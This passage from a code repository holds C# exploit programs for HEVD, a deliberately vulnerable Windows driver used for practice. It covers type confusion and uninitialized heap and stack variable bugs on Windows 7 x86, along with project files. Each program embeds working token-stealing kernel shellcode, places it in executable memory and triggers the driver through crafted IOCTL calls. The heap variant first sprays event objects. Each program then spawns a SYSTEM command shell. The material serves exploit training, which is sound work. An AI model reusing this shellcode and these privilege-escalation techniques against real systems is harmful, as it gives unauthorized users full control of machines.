171 | ref si, out PROCESS_INFORMATION pi);
172 |
173 | if (status)
174 | {
175 | Console.WriteLine("[+] Shell is spawned successfully (PID = {0})", pi.dwProcessId);
176 | WaitForSingleObject(pi.hProcess, 500);
177 | CloseHandle(pi.hProcess);
178 | CloseHandle(pi.hThread);
179 | }
180 | else
181 | {
182 | Console.WriteLine("[!] Failed to spawn shell (code={0})", Marshal.GetLastWin32Error());
183 | }
184 |
185 | return status;
186 | }
187 |
188 | // Main function
189 | static void Main()
190 | {
191 | byte[] shellcode = {
192 | //--[Setup]
193 | 0x60, // pushad
194 | 0x64, 0xA1, 0x24, 0x01, 0x00, 0x00, // mov eax, fs:[KTHREAD_OFFSET]
195 | 0x8B, 0x40, 0x50, // mov eax, [eax + EPROCESS_OFFSET]
196 | 0x89, 0xC1, // mov ecx, eax (Current _EPROCESS structure)
197 | 0x8B, 0x98, 0xF8, 0x00, 0x00, 0x00, // mov ebx, [eax + TOKEN_OFFSET]
198 | //--[Copy System PID token]
199 | 0xBA, 0x04, 0x00, 0x00, 0x00, // mov edx, 4 (SYSTEM PID)
200 | 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, // mov eax, [eax + FLINK_OFFSET] <-|
201 | 0x2D, 0xB8, 0x00, 0x00, 0x00, // sub eax, FLINK_OFFSET |
202 | 0x39, 0x90, 0xB4, 0x00, 0x00, 0x00, // cmp [eax + PID_OFFSET], edx |
203 | 0x75, 0xED, // jnz ->|
204 | 0x8B, 0x90, 0xF8, 0x00, 0x00, 0x00, // mov edx, [eax + TOKEN_OFFSET]
205 | 0x89, 0x91, 0xF8, 0x00, 0x00, 0x00, // mov [ecx + TOKEN_OFFSET], edx
206 | //--[Recover]
207 | 0x61, // popad
208 | 0xC3 // ret
209 | };
210 |
211 | Console.WriteLine("--[ HEVD Exploitation : Type Confusion\n");
212 |
213 | if (!IsWin7x86())
214 | {
215 | return;
216 | }
217 |
218 | // Step 1: Allocate Token Stealing Shellcode
219 | IntPtr ShellcodeBuffer;
220 | uint dwSize = 0x1000;
221 | uint MEM_COMMIT = 0x00001000;
222 | uint MEM_RESERVE = 0x00002000;
223 | uint PAGE_EXECUTE_READWRITE = 0x40;
224 |
225 | Console.WriteLine("[>] Trying to allocate shellcode");
226 | ShellcodeBuffer = VirtualAlloc(IntPtr.Zero, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
227 |
228 | if (ShellcodeBuffer == IntPtr.Zero)
229 | {
230 | Console.WriteLine("[-] Failed to VirtualAlloc (code={0})", Marshal.GetLastWin32Error());
231 | return;
232 | }
233 |
234 | Console.WriteLine("[+] Allocated {0} bytes buffer at 0x{1}", dwSize, ShellcodeBuffer.ToString("X8"));
235 | Marshal.Copy(shellcode, 0, ShellcodeBuffer, shellcode.Length);
236 | Console.WriteLine("[+] Shellcode is allocated at 0x{0}", ShellcodeBuffer.ToString("X8"));
237 |
238 | // Step 2: Prepare malicious data structure
239 | byte[] padding = BitConverter.GetBytes((uint)0xdeadbeef);
240 | byte[] callback = BitConverter.GetBytes(ShellcodeBuffer.ToInt32());
241 | byte[] payload = new byte[padding.Length + callback.Length];
242 | padding.CopyTo(payload, 0);
243 | callback.CopyTo(payload, padding.Length);
244 |
245 | // Step 3: Open driver's handle
246 | string deviceName = "\\\\.\\HacksysExtremeVulnerableDriver";
247 | uint GENERIC_READ = 0x80000000;
248 | uint GENERIC_WRITE = 0x40000000;
249 | uint FILE_SHARE_READ = 0x00000001;
250 | uint FILE_SHARE_WRITE = 0x00000002;
251 | uint OPEN_EXISTING = 0x3;
252 | uint FILE_ATTRIBUTE_NORMAL = 0x80;
253 | uint FILE_FLAG_OVERWRAPPED = 0x40000000;
254 | IntPtr invalid = new IntPtr(-1);
255 |
256 | Console.WriteLine("[>] Opening {0}", deviceName);
257 | hDevice = CreateFile(
258 | deviceName, GENERIC_READ | GENERIC_WRITE,
259 | FILE_SHARE_READ | FILE_SHARE_WRITE, IntPtr.Zero,
260 | OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERWRAPPED, IntPtr.Zero);
261 |
262 | if (hDevice == invalid)
263 | {
264 | Console.WriteLine("[-] Failed to open {0} (code={1})", deviceName, Marshal.GetLastWin32Error());
265 | return;
266 | }
267 |
268 | Console.WriteLine("[+] HEVD.sys is opened succesfuly (hDevice = 0x{0})", hDevice.ToString("X"));
269 |
270 | // Step 4: Trigger type confusion
271 | uint ioctl = 0x222023;
272 | int BytesReturned = 0;
273 |
274 | Console.WriteLine("[>] Triggering type confusion");
275 | bool status = DeviceIoControl(hDevice, ioctl, payload, payload.Length, IntPtr.Zero, 0, ref BytesReturned, IntPtr.Zero);
276 |
277 | if (!status)
278 | {
279 | Console.WriteLine("[-] Failed to send payload (code={0})", Marshal.GetLastWin32Error());
280 | CleanUp();
281 | return;
282 | }
283 | CleanUp();
284 |
285 | // Step 5: Spawn SYSTEM shell
286 | if (IsSystem() && SpawnShell())
287 | {
288 | Console.WriteLine("[+] Exploit is completed successfully");
289 | }
290 | else
291 | {
292 | Console.WriteLine("[-] Failed to exploit");
293 | }
294 | }
295 | }
296 | }
--------------------------------------------------------------------------------
/HEVD_Win7x86/TypeConfusion/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("TypeConfusion")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("TypeConfusion")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("ec2f5921-aca8-4f8f-af6a-f238e0aa61dd")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/TypeConfusion/TypeConfusion.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {EC2F5921-ACA8-4F8F-AF6A-F238E0AA61DD}
8 | Exe
9 | TypeConfusion
10 | TypeConfusion
11 | v2.0
12 | 512
13 | true
14 |
15 |
16 |
17 | x86
18 | ..\bin\x86\Debug\
19 |
20 |
21 | x86
22 | ..\bin\x86\Release\
23 | TRACE
24 | true
25 | pdbonly
26 | true
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/UninitializedHeapVariable/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | using System.Text;
4 |
5 | namespace UninitializedHeapVariable
6 | {
7 | class Program
8 | {
9 | [StructLayout(LayoutKind.Sequential)]
10 | struct SECURITY_ATTRIBUTES
11 | {
12 | public int nLength;
13 | public IntPtr lpSecurityDescriptor;
14 | public int bInheritHandle;
15 | }
16 |
17 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
18 | struct STARTUPINFO
19 | {
20 | public int cb;
21 | public string lpReserved;
22 | public string lpDesktop;
23 | public string lpTitle;
24 | public int dwX;
25 | public int dwY;
26 | public int dwXSize;
27 | public int dwYSize;
28 | public int dwXCountChars;
29 | public int dwYCountChars;
30 | public int dwFillAttribute;
31 | public int dwFlags;
32 | public short wShowWindow;
33 | public short cbReserved2;
34 | public IntPtr lpReserved2;
35 | public IntPtr hStdInput;
36 | public IntPtr hStdOutput;
37 | public IntPtr hStdError;
38 | }
39 |
40 | [StructLayout(LayoutKind.Sequential)]
41 | struct PROCESS_INFORMATION
42 | {
43 | public IntPtr hProcess;
44 | public IntPtr hThread;
45 | public int dwProcessId;
46 | public int dwThreadId;
47 | }
48 |
49 | [DllImport("ntdll.dll")]
50 | static extern void RtlGetNtVersionNumbers(
51 | ref int MajorVersion,
52 | ref int MinorVersion,
53 | ref int BuildNumber);
54 |
55 | [DllImport("kernel32.dll", SetLastError = true)]
56 | static extern IntPtr VirtualAlloc(
57 | IntPtr lpAddress,
58 | uint dwSize,
59 | uint flAllocationType,
60 | uint flProtect);
61 |
62 | [DllImport("kernel32.dll", SetLastError = true)]
63 | static extern IntPtr CreateEventW(
64 | IntPtr lpEventAttributes,
65 | bool bManualReset,
66 | bool bInitialState,
67 | [MarshalAs(UnmanagedType.LPStr)]
68 | string lpName);
69 |
70 | [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
71 | static extern IntPtr CreateFile(
72 | string lpFileName,
73 | uint dwDesiredAccess,
74 | uint dwShareMode,
75 | IntPtr lpSecurityAttributes,
76 | uint dwCreationDisposition,
77 | uint dwFlagsAndAttributes,
78 | IntPtr hTemplateFile);
79 |
80 | [DllImport("kernel32.dll", SetLastError = true)]
81 | static extern bool DeviceIoControl(
82 | IntPtr hDevice,
83 | uint dwIoControlCode,
84 | byte[] InBuffer,
85 | int nInBufferSize,
86 | IntPtr OutBuffer,
87 | int nOutBufferSize,
88 | ref int pBytesReturned,
89 | IntPtr lpOverlapped);
90 |
91 | [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
92 | static extern bool CreateProcess(
93 | string lpApplicationName,
94 | string lpCommandLine,
95 | ref SECURITY_ATTRIBUTES lpProcessAttributes,
96 | ref SECURITY_ATTRIBUTES lpThreadAttributes,
97 | bool bInheritHandles,
98 | uint dwCreationFlags,
99 | IntPtr lpEnvironment,
100 | string lpCurrentDirectory,
101 | ref STARTUPINFO lpStartupInfo,
102 | out PROCESS_INFORMATION lpProcessInformation);
103 |
104 | [DllImport("kernel32.dll", SetLastError = true)]
105 | static extern bool CloseHandle(IntPtr hObject);
106 |
107 | [DllImport("kernel32.dll", SetLastError = true)]
108 | static extern uint WaitForSingleObject(IntPtr hHandle, int dwMilliseconds);
109 |
110 | // Global variables
111 | static IntPtr hDevice = IntPtr.Zero;
112 |
113 | // Helper functions
114 | static void CleanUp()
115 | {
116 | Console.WriteLine("[>] Cleaning up handle object(s)");
117 | if (hDevice != IntPtr.Zero)
118 | {
119 | if (CloseHandle(hDevice))
120 | {
121 | hDevice = IntPtr.Zero;
122 | }
123 | else
124 | {
125 | Console.WriteLine("[!] Failed to close kernel driver's handle (code={0})", Marshal.GetLastWin32Error());
126 | }
127 | }
128 | }
129 |
130 | static bool IsWin7x86()
131 | {
132 | string arch = Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
133 | int MajorVersion = 0;
134 | int MinorVersion = 0;
135 | int BuildNumber = 0;
136 | RtlGetNtVersionNumbers(ref MajorVersion, ref MinorVersion, ref BuildNumber);
137 | BuildNumber &= 0xFFFF;
138 |
139 | if (MajorVersion == 6 && MinorVersion == 1 && BuildNumber == 7601 &&
140 | string.Compare(arch, "x86", StringComparison.OrdinalIgnoreCase) == 0)
141 | {
142 | Console.WriteLine("[+] Windows 7 SP1 x86 is detected");
143 | return true;
144 | }
145 | else
146 | {
147 | Console.WriteLine("[-] Unsupported OS is detected");
148 | return false;
149 | }
150 | }
151 |
152 | static bool IsSystem()
153 | {
154 | string user = Environment.UserName;
155 |
156 | if (string.Compare(user, "SYSTEM", StringComparison.OrdinalIgnoreCase) == 0)
157 | {
158 | return true;
159 | }
160 | else
161 | {
162 | return false;
163 | }
164 | }
165 |
166 | static bool SpawnShell()
167 | {
168 | string ApplicationName = "C:\\Windows\\System32\\cmd.exe";
169 | SECURITY_ATTRIBUTES pSec = new SECURITY_ATTRIBUTES();
170 | SECURITY_ATTRIBUTES tSec = new SECURITY_ATTRIBUTES();
171 | uint CREATE_NEW_CONSOLE = 0x00000010;
172 | string CurrentDirectory = "C:\\Windows\\System32";
173 | STARTUPINFO si = new STARTUPINFO();
174 | pSec.nLength = Marshal.SizeOf(pSec);
175 | tSec.nLength = Marshal.SizeOf(tSec);
176 |
177 | bool status = CreateProcess(
178 | ApplicationName, null, ref pSec, ref tSec, false,
179 | CREATE_NEW_CONSOLE, IntPtr.Zero, CurrentDirectory,
180 | ref si, out PROCESS_INFORMATION pi);
181 |
182 | if (status)
183 | {
184 | Console.WriteLine("[+] Shell is spawned successfully (PID = {0})", pi.dwProcessId);
185 | WaitForSingleObject(pi.hProcess, 500);
186 | CloseHandle(pi.hProcess);
187 | CloseHandle(pi.hThread);
188 | }
189 | else
190 | {
191 | Console.WriteLine("[!] Failed to spawn shell (code={0})", Marshal.GetLastWin32Error());
192 | }
193 |
194 | return status;
195 | }
196 |
197 | static string GetRandomString(int length)
198 | {
199 | byte[] seed = Encoding.ASCII.GetBytes("0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz");
200 | Random rand = new Random();
201 | byte[] randomBytes = new byte[length];
202 |
203 | for (int i = 0; i < length; i++)
204 | {
205 | randomBytes[i] = seed[rand.Next(seed.Length)];
206 | }
207 |
208 | return Encoding.ASCII.GetString(randomBytes);
209 | }
210 |
211 | // Main function
212 | static void Main()
213 | {
214 | byte[] shellcode = {
215 | //--[Setup]
216 | 0x60, // pushad
217 | 0x64, 0xA1, 0x24, 0x01, 0x00, 0x00, // mov eax, fs:[KTHREAD_OFFSET]
218 | 0x8B, 0x40, 0x50, // mov eax, [eax + EPROCESS_OFFSET]
219 | 0x89, 0xC1, // mov ecx, eax (Current _EPROCESS structure)
220 | 0x8B, 0x98, 0xF8, 0x00, 0x00, 0x00, // mov ebx, [eax + TOKEN_OFFSET]
221 | //--[Copy System PID token]
222 | 0xBA, 0x04, 0x00, 0x00, 0x00, // mov edx, 4 (SYSTEM PID)
223 | 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, // mov eax, [eax + FLINK_OFFSET] <-|
224 | 0x2D, 0xB8, 0x00, 0x00, 0x00, // sub eax, FLINK_OFFSET |
225 | 0x39, 0x90, 0xB4, 0x00, 0x00, 0x00, // cmp [eax + PID_OFFSET], edx |
226 | 0x75, 0xED, // jnz ->|
227 | 0x8B, 0x90, 0xF8, 0x00, 0x00, 0x00, // mov edx, [eax + TOKEN_OFFSET]
228 | 0x89, 0x91, 0xF8, 0x00, 0x00, 0x00, // mov [ecx + TOKEN_OFFSET], edx
229 | //--[Recover]
230 | 0x61, // popad
231 | 0xC3 // ret
232 | };
233 |
234 | Console.WriteLine("--[ HEVD Exploitation : Uninitialized Heap Variable\n");
235 |
236 | if (!IsWin7x86())
237 | {
238 | return;
239 | }
240 |
241 | // Step 1: Allocate Token Stealing Shellcode
242 | IntPtr ShellcodeBuffer;
243 | uint dwSize = 0x1000;
244 | uint MEM_COMMIT = 0x00001000;
245 | uint MEM_RESERVE = 0x00002000;
246 | uint PAGE_EXECUTE_READWRITE = 0x40;
247 |
248 | Console.WriteLine("[>] Trying to allocate shellcode");
249 | ShellcodeBuffer = VirtualAlloc(new IntPtr(0x40400140), dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
250 |
251 | if (ShellcodeBuffer == IntPtr.Zero)
252 | {
253 | Console.WriteLine("[-] Failed to VirtualAlloc (code={0})", Marshal.GetLastWin32Error());
254 | return;
255 | }
256 |
257 | Console.WriteLine("[+] Allocated {0} bytes buffer at 0x{1}", dwSize, ShellcodeBuffer.ToString("X8"));
258 | int offset = 0x40400140 - ShellcodeBuffer.ToInt32();
259 | Marshal.Copy(shellcode, 0, new IntPtr(ShellcodeBuffer.ToInt32() + offset), shellcode.Length);
260 | Console.WriteLine("[+] Shellcode is allocated at 0x{0}", ShellcodeBuffer.ToString("X8"));
261 |
262 | // Step 2: Open driver's handle
263 | string deviceName = "\\\\.\\HacksysExtremeVulnerableDriver";
264 | uint GENERIC_READ = 0x80000000;
265 | uint GENERIC_WRITE = 0x40000000;
266 | uint FILE_SHARE_READ = 0x00000001;
267 | uint FILE_SHARE_WRITE = 0x00000002;
268 | uint OPEN_EXISTING = 0x3;
269 | uint FILE_ATTRIBUTE_NORMAL = 0x80;
270 | uint FILE_FLAG_OVERWRAPPED = 0x40000000;
271 | IntPtr invalid = new IntPtr(-1);
272 |
273 | Console.WriteLine("[>] Opening {0}", deviceName);
274 | hDevice = CreateFile(
275 | deviceName, GENERIC_READ | GENERIC_WRITE,
276 | FILE_SHARE_READ | FILE_SHARE_WRITE, IntPtr.Zero,
277 | OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERWRAPPED, IntPtr.Zero);
278 |
279 | if (hDevice == invalid)
280 | {
281 | Console.WriteLine("[-] Failed to open {0} (code={1})", deviceName, Marshal.GetLastWin32Error());
282 | return;
283 | }
284 |
285 | Console.WriteLine("[+] HEVD.sys is opened succesfuly (hDevice = 0x{0})", hDevice.ToString("X"));
286 |
287 | // Step 3: Event object spray and trigger vulnerability
288 | uint ioctl = 0x222033;
289 | byte[] payload = BitConverter.GetBytes(0xdeadbeef);
290 | int BytesReturned = 0;
291 | int num = 256;
292 | IntPtr[] hEvents = new IntPtr[num];
293 | string eventName;
294 | int counter = 0;
295 |
296 | Console.WriteLine("[>] Performing event object spraying and triggering vulnerability");
297 |
298 | for (int i = 0; i < num; i++)
299 | {
300 | eventName = string.Concat("EVIL\x40\x01\x40\x40", GetRandomString(0xf0 - 8));
301 | hEvents[i] = CreateEventW(IntPtr.Zero, false, false, eventName);
302 | if (hEvents[i] != IntPtr.Zero)
303 | {
304 | counter++;
305 | }
306 | }
307 |
308 | Console.WriteLine("[+] {0} event objects are created", counter);
309 | counter = 0;
310 |
311 | for (int i = 0; i < num; i++)
312 | {
313 | if (CloseHandle(hEvents[i]))
314 | {
315 | counter++;
316 | }
317 | }
318 |
319 | bool status = DeviceIoControl(hDevice, ioctl, payload, payload.Length, IntPtr.Zero, 0, ref BytesReturned, IntPtr.Zero);
320 | if (!status)
321 | {
322 | Console.WriteLine("[-] Failed to send payload (code={0})", Marshal.GetLastWin32Error());
323 | CleanUp();
324 | return;
325 | }
326 |
327 | CleanUp();
328 |
329 | // Step 4: Spawn SYSTEM shell
330 | if (IsSystem() && SpawnShell())
331 | {
332 | Console.WriteLine("[+] Exploit is completed successfully");
333 | }
334 | else
335 | {
336 | Console.WriteLine("[-] Failed to exploit");
337 | }
338 | }
339 | }
340 | }
--------------------------------------------------------------------------------
/HEVD_Win7x86/UninitializedHeapVariable/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("UninitializedHeapVariable")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("UninitializedHeapVariable")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("8cf9a838-5690-4da3-ae5d-8043ce1fa141")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/UninitializedHeapVariable/UninitializedHeapVariable.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {8CF9A838-5690-4DA3-AE5D-8043CE1FA141}
8 | Exe
9 | UninitializedHeapVariable
10 | UninitializedHeapVariable
11 | v2.0
12 | 512
13 | true
14 |
15 |
16 | true
17 | ..\bin\x86\Debug\
18 | DEBUG;TRACE
19 | full
20 | x86
21 | 7.3
22 | prompt
23 |
24 |
25 | ..\bin\x86\Release\
26 | TRACE
27 | true
28 | pdbonly
29 | x86
30 | 7.3
31 | prompt
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/UninitializedStackVariable/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/UninitializedStackVariable/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace UninitializedStackVariable
5 | {
6 | class Program
7 | {
8 | [StructLayout(LayoutKind.Sequential)]
9 | struct SECURITY_ATTRIBUTES
10 | {
11 | public int nLength;
12 | public IntPtr lpSecurityDescriptor;
13 | public int bInheritHandle;
14 | }
15 |
16 | [StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
17 | struct STARTUPINFO
18 | {
19 | public int cb;
20 | public string lpReserved;
21 | public string lpDesktop;
22 | public string lpTitle;
23 | public int dwX;
24 | public int dwY;
25 | public int dwXSize;
26 | public int dwYSize;
27 | public int dwXCountChars;
28 | public int dwYCountChars;
29 | public int dwFillAttribute;
30 | public int dwFlags;
31 | public short wShowWindow;
32 | public short cbReserved2;
33 | public IntPtr lpReserved2;
34 | public IntPtr hStdInput;
35 | public IntPtr hStdOutput;
36 | public IntPtr hStdError;
37 | }
38 |
39 | [StructLayout(LayoutKind.Sequential)]
40 | struct PROCESS_INFORMATION
41 | {
42 | public IntPtr hProcess;
43 | public IntPtr hThread;
44 | public int dwProcessId;
45 | public int dwThreadId;
46 | }
47 |
48 | [DllImport("ntdll.dll")]
49 | static extern void RtlGetNtVersionNumbers(
50 | ref int MajorVersion,
51 | ref int MinorVersion,
52 | ref int BuildNumber);
53 |
54 | [DllImport("kernel32.dll", SetLastError = true)]
55 | static extern IntPtr VirtualAlloc(
56 | IntPtr lpAddress,
57 | uint dwSize,
58 | uint flAllocationType,
59 | uint flProtect);
60 |
61 | [DllImport("ntdll.dll")]
62 | static extern int NtMapUserPhysicalPages(
63 | IntPtr BaseAddress,
64 | uint NumberOfPages,
65 | byte[] PageFrameNumbers);
66 |
67 | [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
68 | static extern IntPtr CreateFile(
69 | string lpFileName,
70 | uint dwDesiredAccess,
71 | uint dwShareMode,
72 | IntPtr lpSecurityAttributes,
73 | uint dwCreationDisposition,
74 | uint dwFlagsAndAttributes,
75 | IntPtr hTemplateFile);
76 |
77 | [DllImport("kernel32.dll", SetLastError = true)]
78 | static extern bool DeviceIoControl(
79 | IntPtr hDevice,
80 | uint dwIoControlCode,
81 | byte[] InBuffer,
82 | int nInBufferSize,
83 | IntPtr OutBuffer,
84 | int nOutBufferSize,
85 | ref int pBytesReturned,
86 | IntPtr lpOverlapped);
87 |
88 | [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
89 | static extern bool CreateProcess(
90 | string lpApplicationName,
91 | string lpCommandLine,
92 | ref SECURITY_ATTRIBUTES lpProcessAttributes,
93 | ref SECURITY_ATTRIBUTES lpThreadAttributes,
94 | bool bInheritHandles,
95 | uint dwCreationFlags,
96 | IntPtr lpEnvironment,
97 | string lpCurrentDirectory,
98 | ref STARTUPINFO lpStartupInfo,
99 | out PROCESS_INFORMATION lpProcessInformation);
100 |
101 | [DllImport("kernel32.dll", SetLastError = true)]
102 | static extern bool CloseHandle(IntPtr hObject);
103 |
104 | [DllImport("kernel32.dll", SetLastError = true)]
105 | static extern uint WaitForSingleObject(IntPtr hHandle, int dwMilliseconds);
106 |
107 | // Global variables
108 | static IntPtr hDevice = IntPtr.Zero;
109 |
110 | // Helper functions
111 | static void CleanUp()
112 | {
113 | Console.WriteLine("[>] Cleaning up handle object(s)");
114 | if (hDevice != IntPtr.Zero)
115 | {
116 | if (CloseHandle(hDevice))
117 | {
118 | hDevice = IntPtr.Zero;
119 | }
120 | else
121 | {
122 | Console.WriteLine("[!] Failed to close kernel driver's handle (code={0})", Marshal.GetLastWin32Error());
123 | }
124 | }
125 | }
126 |
127 | static bool IsWin7x86()
128 | {
129 | string arch = Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
130 | int MajorVersion = 0;
131 | int MinorVersion = 0;
132 | int BuildNumber = 0;
133 | RtlGetNtVersionNumbers(ref MajorVersion, ref MinorVersion, ref BuildNumber);
134 | BuildNumber &= 0xFFFF;
135 |
136 | if (MajorVersion == 6 && MinorVersion == 1 && BuildNumber == 7601 &&
137 | string.Compare(arch, "x86", StringComparison.OrdinalIgnoreCase) == 0)
138 | {
139 | Console.WriteLine("[+] Windows 7 SP1 x86 is detected");
140 | return true;
141 | }
142 | else
143 | {
144 | Console.WriteLine("[-] Unsupported OS is detected");
145 | return false;
146 | }
147 | }
148 |
149 | static bool IsSystem()
150 | {
151 | string user = Environment.UserName;
152 |
153 | if (string.Compare(user, "SYSTEM", StringComparison.OrdinalIgnoreCase) == 0)
154 | {
155 | return true;
156 | }
157 | else
158 | {
159 | return false;
160 | }
161 | }
162 |
163 | static bool SpawnShell()
164 | {
165 | string ApplicationName = "C:\\Windows\\System32\\cmd.exe";
166 | SECURITY_ATTRIBUTES pSec = new SECURITY_ATTRIBUTES();
167 | SECURITY_ATTRIBUTES tSec = new SECURITY_ATTRIBUTES();
168 | uint CREATE_NEW_CONSOLE = 0x00000010;
169 | string CurrentDirectory = "C:\\Windows\\System32";
170 | STARTUPINFO si = new STARTUPINFO();
171 | pSec.nLength = Marshal.SizeOf(pSec);
172 | tSec.nLength = Marshal.SizeOf(tSec);
173 |
174 | bool status = CreateProcess(
175 | ApplicationName, null, ref pSec, ref tSec, false,
176 | CREATE_NEW_CONSOLE, IntPtr.Zero, CurrentDirectory,
177 | ref si, out PROCESS_INFORMATION pi);
178 |
179 | if (status)
180 | {
181 | Console.WriteLine("[+] Shell is spawned successfully (PID = {0})", pi.dwProcessId);
182 | WaitForSingleObject(pi.hProcess, 500);
183 | CloseHandle(pi.hProcess);
184 | CloseHandle(pi.hThread);
185 | }
186 | else
187 | {
188 | Console.WriteLine("[!] Failed to spawn shell (code={0})", Marshal.GetLastWin32Error());
189 | }
190 |
191 | return status;
192 | }
193 |
194 | // Main function
195 | static void Main()
196 | {
197 | byte[] shellcode = {
198 | //--[Setup]
199 | 0x60, // pushad
200 | 0x64, 0xA1, 0x24, 0x01, 0x00, 0x00, // mov eax, fs:[KTHREAD_OFFSET]
201 | 0x8B, 0x40, 0x50, // mov eax, [eax + EPROCESS_OFFSET]
202 | 0x89, 0xC1, // mov ecx, eax (Current _EPROCESS structure)
203 | 0x8B, 0x98, 0xF8, 0x00, 0x00, 0x00, // mov ebx, [eax + TOKEN_OFFSET]
204 | //--[Copy System PID token]
205 | 0xBA, 0x04, 0x00, 0x00, 0x00, // mov edx, 4 (SYSTEM PID)
206 | 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, // mov eax, [eax + FLINK_OFFSET] <-|
207 | 0x2D, 0xB8, 0x00, 0x00, 0x00, // sub eax, FLINK_OFFSET |
208 | 0x39, 0x90, 0xB4, 0x00, 0x00, 0x00, // cmp [eax + PID_OFFSET], edx |
209 | 0x75, 0xED, // jnz ->|
210 | 0x8B, 0x90, 0xF8, 0x00, 0x00, 0x00, // mov edx, [eax + TOKEN_OFFSET]
211 | 0x89, 0x91, 0xF8, 0x00, 0x00, 0x00, // mov [ecx + TOKEN_OFFSET], edx
212 | //--[Recover]
213 | 0x61, // popad
214 | 0xC3 // ret
215 | };
216 |
217 | Console.WriteLine("--[ HEVD Exploitation : Uninitialized Stack Variable\n");
218 |
219 | if (!IsWin7x86())
220 | {
221 | return;
222 | }
223 |
224 | // Step 1: Allocate Token Stealing Shellcode
225 | IntPtr ShellcodeBuffer;
226 | uint dwSize = 0x1000;
227 | uint MEM_COMMIT = 0x00001000;
228 | uint MEM_RESERVE = 0x00002000;
229 | uint PAGE_EXECUTE_READWRITE = 0x40;
230 |
231 | Console.WriteLine("[>] Trying to allocate shellcode");
232 | ShellcodeBuffer = VirtualAlloc(IntPtr.Zero, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
233 |
234 | if (ShellcodeBuffer == IntPtr.Zero)
235 | {
236 | Console.WriteLine("[-] Failed to VirtualAlloc (code={0})", Marshal.GetLastWin32Error());
237 | return;
238 | }
239 |
240 | Console.WriteLine("[+] Allocated {0} bytes buffer at 0x{1}", dwSize, ShellcodeBuffer.ToString("X8"));
241 | Marshal.Copy(shellcode, 0, ShellcodeBuffer, shellcode.Length);
